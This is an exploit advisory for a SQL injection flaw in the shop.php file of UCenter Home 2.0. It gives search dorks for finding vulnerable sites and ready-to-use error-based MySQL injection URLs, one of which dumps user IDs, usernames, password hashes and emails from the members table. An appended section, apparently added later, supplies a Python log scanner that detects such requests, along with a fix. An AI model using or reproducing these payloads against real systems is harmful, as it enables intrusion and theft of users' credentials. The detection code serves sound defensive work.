__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and Iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php
Values : (?)ac=view&shopid=
Vulnerable Style : SQL Injection (MySQL Error Based)
Needed Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim database name.

for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

..

DB : Okay.

Edit the DB : `[TARGET DB NAME]`

Example : 'hiwir1_ucenter'

Edit : Okay.

Use hex conversion and edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
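
Defender-side check for the issue above, as an added example that is not part of the original advisory: it scans web access logs for `shop.php` requests whose `shopid` is not a plain integer and tags the MySQL error-based markers seen in the strings above. The combined log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Substrings typical of the MySQL error-based technique named in the advisory.
ERROR_BASED_MARKERS = ("information_schema", "floor(rand(", "group by", "concat(")
# Request field of a combined-format access log line (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP ranges, shortened payload).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] '
    '"GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:07 +0000] '
    '"GET /shop.php?ac=view&shopid=253%20and(select%201%20from(select%20count(*),'
    'concat(0x7e,floor(rand(0)*2))x%20from%20information_schema.tables'
    '%20group%20by%20x)a) HTTP/1.1" 200 812',
    '198.51.100.2 - - [01/Jan/2024:10:01:00 +0000] '
    '"GET /shop.php?ac=view&shopid=12abc HTTP/1.1" 200 640',
]

def check_request(url):
    """Return a finding dict if shopid on shop.php is not a plain integer."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith("/shop.php"):
        return None
    for value in parse_qs(parts.query).get("shopid", []):
        if value.isascii() and value.isdigit():
            continue  # the only shape a shop id should have
        lowered = re.sub(r"\s+", " ", value.lower())
        hits = [m for m in ERROR_BASED_MARKERS if m in lowered]
        return {"shopid": value, "markers": hits,
                "severity": "high" if hits else "review"}
    return None

def scan(log_lines):
    """Collect findings for every log line that carries a request URL."""
    findings = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        finding = check_request(match.group(1)) if match else None
        if finding:
            findings.append(finding)
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["severity"], f["markers"], f["shopid"][:40])
```

The same integer-only rule is the server-side fix: reject or cast `shopid` before it reaches the query, and use a parameterized statement rather than string concatenation.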